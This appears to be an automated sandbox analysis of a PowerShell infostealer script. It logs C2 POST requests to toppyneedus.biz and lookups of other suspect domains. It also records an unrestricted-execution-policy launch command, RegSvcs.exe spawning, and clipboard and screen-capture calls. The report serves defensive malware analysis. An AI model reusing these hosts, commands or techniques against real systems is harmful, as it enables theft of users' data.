      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49802 -> 104.21.29.142:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=69MNZEJ5HAECH070User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12831Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O3L3XFLJLHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15027Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FEGAA9ZO8PKK2GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20376Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GGL558OSKC7I9LMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2610Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RVMKHS8IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 150286Host: toppyneedus.biz
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: toppyneedus.biz
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: time.windows.com
      Source: global trafficDNS traffic detected: DNS query: grapeprivatter.cyou
      Source: global trafficDNS traffic detected: DNS query: impolitewearr.biz
      Source: global trafficDNS traffic detected: DNS query: toppyneedus.biz
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
      Source: powershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1914181434.00000219C75E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co-M1
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/N
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1520232488.00000000011CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/api
      Source: RegSvcs.exe, 00000003.00000002.1520290770.00000000011E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/apieB
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/apiz
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/it
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/pi
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49802 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49826 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043A020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_0043A020
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043A020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_0043A020
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043A1C0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,3_2_0043A1C0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC48211D0_2_00007FFAAC48211D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043E8D03_2_0043E8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043388C3_2_0043388C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040BA503_2_0040BA50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CA903_2_0040CA90
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00445B303_2_00445B30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042CBE03_2_0042CBE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043EC103_2_0043EC10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004264203_2_00426420
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041CEE63_2_0041CEE6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00429F423_2_00429F42
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004127623_2_00412762
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040F7173_2_0040F717
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004467E03_2_004467E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004010403_2_00401040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004258503_2_00425850
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004090003_2_00409000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004190003_2_00419000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043E0003_2_0043E000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004360103_2_00436010
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004460103_2_00446010
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042D0203_2_0042D020
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004450C03_2_004450C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004228D03_2_004228D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004450D93_2_004450D9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004450DB3_2_004450DB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004300E03_2_004300E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A8F03_2_0042A8F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B0F43_2_0041B0F4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040D0B03_2_0040D0B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004048B23_2_004048B2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004380B03_2_004380B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042F0B53_2_0042F0B5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042D14A3_2_0042D14A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004271503_2_00427150
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C9553_2_0041C955
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043395B3_2_0043395B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004131003_2_00413100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A1203_2_0041A120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043F9C03_2_0043F9C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042DA423_2_0042DA42
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042E2403_2_0042E240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043DA4B3_2_0043DA4B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042C2503_2_0042C250
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043E2603_2_0043E260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00435A693_2_00435A69
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004162003_2_00416200
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004242303_2_00424230
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00444A313_2_00444A31
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042AAC23_2_0042AAC2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042EAC03_2_0042EAC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004222803_2_00422280
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043428A3_2_0043428A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00433AA03_2_00433AA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004402A03_2_004402A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00421B503_2_00421B50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040A3603_2_0040A360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E3603_2_0040E360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042E3673_2_0042E367
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004133093_2_00413309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004453103_2_00445310
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402B303_2_00402B30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00434BE03_2_00434BE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004343EF3_2_004343EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004463F03_2_004463F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408B903_2_00408B90
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004343933_2_00434393
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B3A03_2_0041B3A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004433A13_2_004433A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004363AF3_2_004363AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004453B03_2_004453B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00411BBF3_2_00411BBF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041FC4E3_2_0041FC4E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00426C203_2_00426C20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A4E03_2_0042A4E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042FE493_2_0042FE49
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00413CB03_2_00413CB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043D5603_2_0043D560
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042DD6D3_2_0042DD6D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A51C3_2_0041A51C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004105D03_2_004105D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004095803_2_00409580
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004035903_2_00403590
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040BDA03_2_0040BDA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00439DA03_2_00439DA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041E5B03_2_0041E5B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042FE493_2_0042FE49
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040C6603_2_0040C660
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00407E603_2_00407E60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00421E703_2_00421E70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004436343_2_00443634
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00420EC33_2_00420EC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043F6C03_2_0043F6C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004156CB3_2_004156CB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004456E03_2_004456E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004336983_2_00433698
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004226A03_2_004226A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A7503_2_0042A750
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004027603_2_00402760
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004287643_2_00428764
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041BF763_2_0041BF76
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043C7783_2_0043C778
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042BF003_2_0042BF00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043FF003_2_0043FF00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004427103_2_00442710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00403FD03_2_00403FD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040EF953_2_0040EF95
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041D7973_2_0041D797
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00444FB03_2_00444FB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00418FF0 appears 75 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040B350 appears 50 times
      Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@6/10@4/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043EC10 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043EC10
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vujytmm.nh1.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 176.113.115.225.ps1Virustotal: Detection: 11%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
